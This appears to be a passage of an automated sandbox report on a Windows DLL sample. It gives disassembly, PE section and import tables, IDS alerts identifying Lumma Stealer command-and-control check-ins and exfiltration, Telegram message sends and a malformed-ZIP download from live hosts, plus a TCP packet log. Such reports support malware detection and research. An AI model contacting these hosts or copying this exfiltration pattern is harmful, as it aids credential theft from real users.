                                                                                              push 10015620h
                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                              push eax
                                                                                              call 00007FF89C829471h
                                                                                              int3
                                                                                              jmp 00007FF89C82BAB6h
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push 00000000h
                                                                                              call dword ptr [10010004h]
                                                                                              push dword ptr [ebp+08h]
                                                                                              call dword ptr [10010000h]
                                                                                              push C0000409h
                                                                                              call dword ptr [10010008h]
                                                                                              push eax
                                                                                              call dword ptr [1001000Ch]
                                                                                              pop ebp
                                                                                              ret
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              sub esp, 00000324h
                                                                                              push 00000017h
                                                                                              call dword ptr [10010010h]
                                                                                              test eax, eax
                                                                                              je 00007FF89C8285D7h
                                                                                              push 00000002h
                                                                                              pop ecx
                                                                                              int 29h
                                                                                              mov dword ptr [10017A50h], eax
                                                                                              mov dword ptr [10017A4Ch], ecx
                                                                                              mov dword ptr [10017A48h], edx
                                                                                              mov dword ptr [10017A44h], ebx
                                                                                              mov dword ptr [10017A40h], esi
                                                                                              mov dword ptr [10017A3Ch], edi

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x15ce00x50.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x15d300x28.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x190000xfdc.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x14f3c0x1c.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x14f580x40.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x100000x120.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000xe9ae0xea006b6083b0a808e39361dec305fd766524False0.603248530982906data6.56645402014901IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x100000x63be0x640033504ca0b477cfca5e9bae28b9295a2dFalse0.4229296875zlib compressed data4.935023894243395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0x170000x13780xa00940950c6b85fb08d5f90d2d612f17f8cFalse0.16953125data2.396097838960016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .reloc0x190000xfdc0x1000c3938240bf6031ca233ad2a21bc5c3d2False0.777099609375data6.484463515997174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                              Imports

                                                                                              DLLImport
                                                                                              KERNEL32.dllUnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, RaiseException, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, CompareStringW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, DecodePointer

                                                                                              Exports

                                                                                              NameOrdinalAddress
                                                                                              DllRegisterServer10x10001000

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2024-12-27T22:32:58.287929+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449732149.154.167.220443TCP
                                                                                              2024-12-27T22:32:58.346022+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449731149.154.167.220443TCP
                                                                                              2024-12-27T22:32:58.367886+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449730149.154.167.220443TCP
                                                                                              2024-12-27T22:33:00.345165+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.449733149.154.167.220443TCP
                                                                                              2024-12-27T22:33:10.318916+01002800029ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass1147.45.44.13180192.168.2.449741TCP
                                                                                              2024-12-27T22:33:13.149207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746104.21.60.24443TCP
                                                                                              2024-12-27T22:33:13.151135+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745104.21.60.24443TCP
                                                                                              2024-12-27T22:33:13.174962+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449747104.21.60.24443TCP
                                                                                              2024-12-27T22:33:13.917198+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449745104.21.60.24443TCP
                                                                                              2024-12-27T22:33:13.917198+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745104.21.60.24443TCP
                                                                                              2024-12-27T22:33:14.145093+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449746104.21.60.24443TCP
                                                                                              2024-12-27T22:33:14.145093+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449746104.21.60.24443TCP
                                                                                              2024-12-27T22:33:14.156465+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449747104.21.60.24443TCP
                                                                                              2024-12-27T22:33:14.156465+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449747104.21.60.24443TCP
                                                                                              2024-12-27T22:33:15.295801+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449749104.21.60.24443TCP
                                                                                              2024-12-27T22:33:15.632826+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.60.24443TCP
                                                                                              2024-12-27T22:33:15.637538+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751104.21.60.24443TCP
                                                                                              2024-12-27T22:33:15.736647+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.60.24443TCP
                                                                                              2024-12-27T22:33:16.406176+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449750104.21.60.24443TCP
                                                                                              2024-12-27T22:33:16.406176+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750104.21.60.24443TCP
                                                                                              2024-12-27T22:33:16.410276+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449751104.21.60.24443TCP
                                                                                              2024-12-27T22:33:16.410276+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449751104.21.60.24443TCP
                                                                                              2024-12-27T22:33:16.504808+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449752104.21.60.24443TCP
                                                                                              2024-12-27T22:33:16.504808+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449752104.21.60.24443TCP
                                                                                              2024-12-27T22:33:17.800514+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.60.24443TCP
                                                                                              2024-12-27T22:33:18.118672+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757104.21.60.24443TCP
                                                                                              2024-12-27T22:33:18.579172+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449755104.21.60.24443TCP
                                                                                              2024-12-27T22:33:18.579172+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449755104.21.60.24443TCP
                                                                                              2024-12-27T22:33:20.468696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449759104.21.60.24443TCP
                                                                                              2024-12-27T22:33:21.291774+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449759104.21.60.24443TCP
                                                                                              2024-12-27T22:33:22.642716+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449761104.21.60.24443TCP
                                                                                              2024-12-27T22:33:25.368007+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449762104.21.60.24443TCP
                                                                                              2024-12-27T22:33:25.371664+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449763104.21.60.24443TCP
                                                                                              2024-12-27T22:33:27.646795+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449764104.21.60.24443TCP
                                                                                              2024-12-27T22:33:27.726911+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449765104.21.60.24443TCP
                                                                                              2024-12-27T22:33:30.225396+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449766104.21.60.24443TCP
                                                                                              2024-12-27T22:33:31.355502+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449767104.21.60.24443TCP
                                                                                              2024-12-27T22:33:32.419887+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449767104.21.60.24443TCP
                                                                                              2024-12-27T22:33:33.056891+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449768104.21.60.24443TCP
                                                                                              2024-12-27T22:33:33.062072+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449769104.21.60.24443TCP
                                                                                              2024-12-27T22:33:35.300277+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449770104.21.60.24443TCP
                                                                                              2024-12-27T22:33:35.326498+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449771104.21.60.24443TCP
                                                                                              2024-12-27T22:33:37.378300+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449772104.21.60.24443TCP
                                                                                              2024-12-27T22:33:39.029433+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449773104.21.60.24443TCP
                                                                                              2024-12-27T22:33:39.529055+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449774104.21.60.24443TCP
                                                                                              2024-12-27T22:33:39.826826+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449773104.21.60.24443TCP
                                                                                              2024-12-27T22:33:41.877377+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449775104.21.60.24443TCP
                                                                                              2024-12-27T22:33:45.407596+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449776104.21.60.24443TCP
                                                                                              2024-12-27T22:33:46.187336+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449776104.21.60.24443TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 27, 2024 22:32:56.362483978 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.362529993 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:56.362646103 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.363296986 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.363351107 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:56.363409996 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.364830017 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.364923000 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:56.365048885 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.376581907 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.376605988 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:56.376837969 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.376874924 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:56.377460003 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:56.377475977 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.743907928 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.743988037 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.747652054 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.747725964 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.752017021 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.752082109 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.762917995 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.762965918 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.763209105 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.764005899 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.764022112 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.764247894 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.777163029 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.791903973 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.791918993 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.792247057 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.809042931 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.823333025 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.827989101 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:57.855333090 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:57.871332884 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.288022995 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.288213968 CET44349732149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.288280010 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.291963100 CET49732443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.327408075 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.327455997 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.327554941 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.332492113 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.332509995 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.346065044 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.346158981 CET44349731149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.346236944 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.348519087 CET49731443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.367924929 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.367995977 CET44349730149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:58.368076086 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:58.369811058 CET49730443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:59.795882940 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:59.795985937 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:59.800781965 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:59.800789118 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:59.801079035 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:32:59.807356119 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:32:59.851344109 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:33:00.345278978 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:33:00.345495939 CET44349733149.154.167.220192.168.2.4
                                                                                              Dec 27, 2024 22:33:00.345628977 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:33:00.346662998 CET49733443192.168.2.4149.154.167.220
                                                                                              Dec 27, 2024 22:33:01.883930922 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.003485918 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:02.003568888 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.008841038 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.128391981 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:02.223800898 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.343461990 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:02.343550920 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.362827063 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.482507944 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:02.602885008 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.722882032 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:02.723042965 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.730586052 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:02.850661039 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.302025080 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.302047014 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.302162886 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.303366899 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.423687935 CET8049734147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.423758984 CET4973480192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.602217913 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.602278948 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.602348089 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.602679014 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:03.723012924 CET8049735147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:03.723100901 CET4973580192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.075124979 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:04.075239897 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:04.075299025 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.075659037 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.195502043 CET8049736147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:04.195564032 CET4973680192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.880934000 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:04.904747963 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.000477076 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.000749111 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.000866890 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.024321079 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.025543928 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.025715113 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.056417942 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.120572090 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.145176888 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.176157951 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:05.176326036 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.176923037 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:05.296688080 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288124084 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288167953 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288206100 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288259029 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288259983 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288311005 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288311005 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288346052 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288379908 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288414955 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288433075 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288463116 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.288502932 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288532972 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.288575888 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356055975 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356112957 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356147051 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356168985 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356235981 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356267929 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356276989 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356302977 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356336117 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356345892 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356372118 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356416941 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.356427908 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356462002 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.356502056 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.408155918 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.408257961 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.408310890 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.412235022 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440737009 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440768003 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440804005 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440819979 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.440860033 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440908909 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.440922976 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.440959930 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441000938 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.441009998 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441044092 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441076994 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441091061 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.441131115 CET8049739147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.441174984 CET4973980192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.476685047 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.476735115 CET8049737147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.476793051 CET4973780192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.479731083 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.479800940 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.479871988 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.483987093 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.484030962 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.484093904 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.492468119 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.492518902 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.492518902 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.500835896 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.500880003 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.500888109 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.509320021 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.509366989 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.509407043 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.517775059 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.517824888 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.517900944 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.526237011 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.526274920 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.526293993 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.535098076 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.535150051 CET4973880192.168.2.4147.45.44.131
                                                                                              Dec 27, 2024 22:33:06.535197020 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.543091059 CET8049738147.45.44.131192.168.2.4
                                                                                              Dec 27, 2024 22:33:06.543142080 CET4973880192.168.2.4147.45.44.131
